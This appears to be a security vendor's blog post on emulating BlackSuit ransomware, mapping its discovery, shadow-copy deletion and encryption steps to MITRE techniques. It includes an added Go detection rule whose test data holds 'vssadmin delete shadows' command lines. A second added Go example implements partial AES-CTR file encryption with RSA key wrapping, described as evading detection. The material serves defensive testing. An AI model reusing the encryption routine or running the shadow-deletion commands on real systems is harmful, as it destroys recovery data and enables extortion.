Emulating the Elegant BlackSuit Ransomware

BlackSuit is a ransomware strain that has been active since at least May 2023. It represents the evolution of the ransomware previously identified as Royal ransomware, which was active from approximately September 2022 through June 2023. BlackSuit shares significant code-level similarities with Royal while introducing enhanced functionality and operational refinements, indicating a direct lineage rather than a separate affiliate operation.

Phishing emails remain one of the most effective initial access vectors observed in BlackSuit intrusions. After gaining a foothold, operators establish persistence, disable antivirus and other security tooling, and exfiltrate large volumes of sensitive data before deploying the ransomware payload to encrypt affected systems. This is the well-established double-extortion model: data is stolen before encryption, and the operators threaten to publish it on a Dedicated Leak Site (DLS) if the ransom is not paid.

BlackSuit supports partial encryption: operators can configure what percentage of each file is encrypted instead of encrypting every byte. Applying a lower percentage to large files still renders them unusable while cutting the time and disk I/O the encryption routine needs, and the smaller write footprint produces fewer of the behavioral indicators that security controls rely on to detect ransomware activity.

Ransom demands associated with BlackSuit operations typically range between approximately USD $1 million and $10 million, with payments demanded exclusively in Bitcoin. Cumulatively, BlackSuit actors have demanded more than USD $500 million, with the largest known single ransom demand reaching USD $60 million. While ransom amounts are not disclosed in the initial ransom note, victims are directed to communicate with the operators via a Tor-hosted (.onion) portal, where negotiations frequently occur, and operators have demonstrated a willingness to adjust payment terms.

AttackIQ has released a new attack graph that emulates the Tactics, Techniques, and Procedures (TTPs) associated with the deployment of BlackSuit ransomware to help customers validate their security controls and their ability to defend against this threat.

Validating your security program performance against these behaviors is vital in reducing risk. By using this new emulation in the AttackIQ Adversarial Exposure Validation (AEV) Platform, security teams will be able to:

  • Evaluate security control performance against baseline behaviors associated with the BlackSuit ransomware.
  • Assess their security posture against an opportunistic adversary, which does not discriminate when it comes to selecting its targets.
  • Continuously validate detection and prevention pipelines against a playbook similar to those of many of the groups currently focused on ransomware activities.

[Malware Emulation] BlackSuit Ransomware – 2024-08 – Associated Tactics, Techniques and Procedures (TTPs)

This emulation replicates the sequence of behaviors associated with the deployment of BlackSuit ransomware on a compromised system, giving customers the opportunity to confirm that their controls detect and/or prevent a compromise in progress.

The emulation is based on behaviors reported by the Cybersecurity and Infrastructure Security Agency (CISA) on August 27, 2024, and the DFIR Report on August 26, 2024.

Execution & Discovery – Environment Reconnaissance

This stage begins with the deployment of the BlackSuit ransomware sample. Once running, it checks for an attached debugger by calling IsDebuggerPresent, gathers basic system information with GetNativeSystemInfo, enumerates running processes with CreateToolhelp32Snapshot, Process32FirstW, and Process32NextW, and infers the geographic and regional context of the compromised host from EnumSystemLocalesW, GetLocaleInfoW, and GetUserDefaultLCID.

2023-05 BlackSuit Ransomware Sample (T1105): The BlackSuit Ransomware Sample (SHA256: 90ae0c693f6ffd6dc5bb2d5a5ef078629c3d77f874b2d2ebd9e109d8ca049f2c) is saved to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

Debugger Detection via “IsDebuggerPresent” Native API (T1497): This scenario will execute the IsDebuggerPresent Windows API to detect the presence of a debugger attached to the current process.

System Information Discovery via “GetNativeSystemInfo” Native API (T1082): This scenario executes the GetNativeSystemInfo Windows API call to retrieve information associated with the system, such as processor architecture and page size.

Process Discovery via Native API (T1057): This scenario uses the Windows API to obtain a list of running processes by calling CreateToolhelp32Snapshot and iterating through each process entry with Process32FirstW and Process32NextW.

Enumerate System Locales via “EnumSystemLocalesW” Windows API (T1614): This scenario executes the EnumSystemLocalesW Windows API to enumerate the locales installed on or supported by the operating system.

Obtain System Locales Information via “GetLocaleInfoW” Windows API (T1614): This scenario executes the GetLocaleInfoW Windows API to retrieve locale information, such as the country/region code, for the user’s default locale.

Get User Default Locale ID via “GetUserDefaultLCID” Native API (T1614): This scenario executes the GetUserDefaultLCID Windows API to retrieve the user default locale ID from the system.

Impact – BlackSuit Ransomware Encryption

This stage begins with the deletion of existing Volume Shadow Copies through vssadmin.exe, removing the local restore points a victim could otherwise recover from. Next, it identifies the available logical drives via GetLogicalDriveStringsW and walks the filesystem with FindFirstFileW and FindNextFileW to enumerate candidate files. Finally, the sample encrypts the identified files using AES-256 in CTR mode for the file contents and RSA-4096 to protect the AES key material.

Delete created Volume Shadow Copy using “vssadmin.exe” (T1490): This scenario executes the vssadmin.exe utility to delete a recent Volume Shadow Copy created by the assessment template.
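As an added example that is not part of the AttackIQ template or the original post, the following Go program runs a detection rule for this step over a handful of constructed process-creation events, using the fields a Sysmon Event ID 1 record carries (Image, OriginalFileName, CommandLine). It lowercases and collapses whitespace before matching, and identifies vssadmin by image name, by the PE original file name, or by the token anywhere in the command line, so a renamed binary or a `cmd.exe /c vssadmin ...` wrapper is still caught, while the `vssadmin create shadow` step that precedes the deletion in the assessment template does not alert. The struct layout, function names and sample events are assumptions for the example.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// ProcessEvent is the subset of a process-creation record (Sysmon Event ID 1, or
// Security 4688 with command-line auditing enabled) that the rule below needs.
// OriginalFileName comes from the binary's PE version resource, which Sysmon
// logs; it survives renaming the executable on disk. (Field set is an assumption.)
type ProcessEvent struct {
	Image            string
	OriginalFileName string
	CommandLine      string
}

// deleteShadows matches the verb and object of `vssadmin delete shadows` once the
// command line has been lowercased and its whitespace collapsed, so padding, tabs
// or mixed case ("Delete  SHADOWS") cannot slip past a literal substring check.
var deleteShadows = regexp.MustCompile(`\bdelete shadows\b`)

// baseName returns the file name component of a Windows path.
func baseName(p string) string {
	if i := strings.LastIndexAny(p, `\/`); i >= 0 {
		return p[i+1:]
	}
	return p
}

// IsShadowCopyDeletion reports whether a process-creation event is a vssadmin
// shadow copy deletion. Three signals identify vssadmin (the image name, the PE
// original file name, or the token anywhere in the command line, which also
// catches `cmd.exe /c vssadmin ...` in the parent's event); any one of them plus
// the `delete shadows` arguments is enough to alert.
func IsShadowCopyDeletion(e ProcessEvent) bool {
	cmd := strings.ToLower(strings.Join(strings.Fields(e.CommandLine), " "))
	isVss := strings.EqualFold(baseName(e.Image), "vssadmin.exe") ||
		strings.EqualFold(e.OriginalFileName, "vssadmin.exe") ||
		strings.Contains(cmd, "vssadmin")
	return isVss && deleteShadows.MatchString(cmd)
}

// Detect returns the events that should raise an alert.
func Detect(events []ProcessEvent) []ProcessEvent {
	var hits []ProcessEvent
	for _, e := range events {
		if IsShadowCopyDeletion(e) {
			hits = append(hits, e)
		}
	}
	return hits
}

// sampleEvents is constructed test data, not telemetry from a real intrusion. The
// first four should alert; the last two (a listing, and the shadow copy the
// assessment template creates before deleting it) should not.
func sampleEvents() []ProcessEvent {
	return []ProcessEvent{
		{`C:\Windows\System32\vssadmin.exe`, "VSSADMIN.EXE", `vssadmin.exe Delete Shadows /All /Quiet`},
		{`C:\Windows\System32\vssadmin.exe`, "VSSADMIN.EXE", `"C:\Windows\System32\vssadmin.exe" delete shadows /shadow={00000000-1111-2222-3333-444444444444} /quiet`},
		{`C:\Windows\System32\cmd.exe`, "Cmd.Exe", "cmd.exe /c  vssadmin\tdelete   shadows /all /quiet"},
		{`C:\Users\Public\vss.exe`, "VSSADMIN.EXE", `vss.exe delete shadows /all /quiet`}, // renamed copy
		{`C:\Windows\System32\vssadmin.exe`, "VSSADMIN.EXE", `vssadmin list shadows`},
		{`C:\Windows\System32\vssadmin.exe`, "VSSADMIN.EXE", `vssadmin create shadow /for=C:`},
	}
}

func main() {
	for _, e := range Detect(sampleEvents()) {
		fmt.Printf("ALERT T1490 shadow copy deletion: image=%s cmd=%q\n", e.Image, e.CommandLine)
	}
}
```

Run as-is it prints four alerts. The rule deliberately keys on the `delete shadows` arguments rather than on vssadmin.exe alone, because the assessment template (and ordinary backup tooling) legitimately creates and lists shadow copies; alerting on the binary name would drown the one event that matters.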

Logical Drive Discovery via “GetLogicalDriveStringsW” Native API (T1680): This scenario executes the GetLogicalDriveStringsW Windows API to retrieve the list of valid logical drives (drive letters) on the system.

File and Directory Discovery via “FindFirstFileW” and “FindNextFileW” Native API (T1083): This scenario executes the FindFirstFileW and FindNextFileW Windows native API calls to enumerate the file system.

BlackSuit File Encryption (T1486): This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using encryption algorithms similar to those used by BlackSuit ransomware.
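The hybrid scheme described in the Impact stage (AES-256 in CTR mode for the file contents, RSA-4096 to protect the AES key) together with the configurable partial-encryption percentage described earlier, worked through in Go as an added example. This is neither BlackSuit's code nor the AttackIQ scenario: the layout (the file split into ten equal regions, with the first `percent` of each region encrypted and the rest left in cleartext), the size threshold below which files are encrypted whole, and the function names are assumptions for illustration. They are chosen to make the trade-off visible: at 10 percent only a tenth of a large file's bytes are rewritten, yet the file is unusable.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
)

// ASSUMED layout for this worked example (not BlackSuit's real on-disk format): a
// file is split into regionCount equal-width regions and the first `percent` percent
// of each region is encrypted with AES-256-CTR; the rest stays in cleartext.
const regionCount = 10 // assumption: regions per file

// partialRanges returns the [start, end) byte ranges that will be encrypted in a file
// of n bytes. Files no larger than fullBelow bytes, or percent >= 100, are encrypted whole.
func partialRanges(n int64, percent int, fullBelow int64) [][2]int64 {
	if n <= 0 || percent <= 0 {
		return nil
	}
	if percent >= 100 || n <= fullBelow {
		return [][2]int64{{0, n}}
	}
	region := (n + regionCount - 1) / regionCount // ceiling division
	var ranges [][2]int64
	for start := int64(0); start < n; start += region {
		end := start + region
		if end > n {
			end = n
		}
		if encLen := (end - start) * int64(percent) / 100; encLen > 0 {
			ranges = append(ranges, [2]int64{start, start + encLen})
		}
	}
	return ranges
}

// encryptedFile: the body with the selected ranges overwritten in place, the ranges
// themselves, and the RSA-OAEP-wrapped key||IV the decryptor needs to unwind them.
type encryptedFile struct {
	Body       []byte
	Ranges     [][2]int64
	WrappedKey []byte
}

// newKeyPair generates the operator's RSA key pair; the page describes RSA-4096.
func newKeyPair(bits int) (*rsa.PrivateKey, error) {
	return rsa.GenerateKey(rand.Reader, bits)
}

// ctrXOR runs one AES-256-CTR keystream (keyIV = 32 key bytes || 16-byte IV) across the
// ranges in order and returns a copy of src with only those ranges transformed. Encrypt
// and decrypt replay identical ranges in identical order so the keystream stays aligned.
func ctrXOR(keyIV, src []byte, ranges [][2]int64) ([]byte, error) {
	if len(keyIV) != 32+aes.BlockSize {
		return nil, fmt.Errorf("key material is %d bytes, want %d", len(keyIV), 32+aes.BlockSize)
	}
	block, err := aes.NewCipher(keyIV[:32])
	if err != nil {
		return nil, err
	}
	stream := cipher.NewCTR(block, keyIV[32:])
	out := append([]byte(nil), src...)
	for _, r := range ranges {
		stream.XORKeyStream(out[r[0]:r[1]], src[r[0]:r[1]])
	}
	return out, nil
}

// encryptPartial draws a fresh per-file key and IV, encrypts the chosen ranges, and
// wraps the key material with the operator's RSA public key (OAEP, SHA-256).
func encryptPartial(pub *rsa.PublicKey, plaintext []byte, percent int, fullBelow int64) (*encryptedFile, error) {
	keyIV := make([]byte, 32+aes.BlockSize)
	if _, err := rand.Read(keyIV); err != nil {
		return nil, err
	}
	ranges := partialRanges(int64(len(plaintext)), percent, fullBelow)
	body, err := ctrXOR(keyIV, plaintext, ranges)
	if err != nil {
		return nil, err
	}
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, keyIV, nil)
	if err != nil {
		return nil, err
	}
	return &encryptedFile{Body: body, Ranges: ranges, WrappedKey: wrapped}, nil
}

// decryptPartial is what the operator's decryptor does: unwrap key||IV with the RSA
// private key, then replay the same CTR keystream over the same ranges.
func decryptPartial(priv *rsa.PrivateKey, ef *encryptedFile) ([]byte, error) {
	keyIV, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, priv, ef.WrappedKey, nil)
	if err != nil {
		return nil, err
	}
	return ctrXOR(keyIV, ef.Body, ef.Ranges)
}
```

For a 4096-byte file at 20 percent with a 1024-byte threshold, `partialRanges` yields ten ranges touching 819 bytes in total; the bytes between ranges are left exactly as they were, which is why a detection that relies purely on write volume or whole-file entropy sees far less than it would from full encryption. Because the CTR keystream is consumed across the ranges in order, the decryptor needs the same percentage and layout; a real implementation would have to persist them alongside the wrapped key (for example in a file footer), and a defender who recovers the RSA private key needs them too.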

Wrap-up

In summary, this emulation will evaluate security and incident response processes and support the improvement of your security control posture against the behaviors exhibited by BlackSuit ransomware. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ®, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.

Francis Guibernau

Francis conducts in-depth threat research and analysis to design and create highly sophisticated and realistic adversary emulations. He also coordinates the CTI project, which focuses on researching, analyzing, tracking, and documenting adversaries, malware families, and cybersecurity incidents. Francis has extensive experience in adversary intelligence, encompassing both Nation-State and eCrime threats, as well as in vulnerability assessment and management, having previously worked at Deloitte and BNP Paribas.
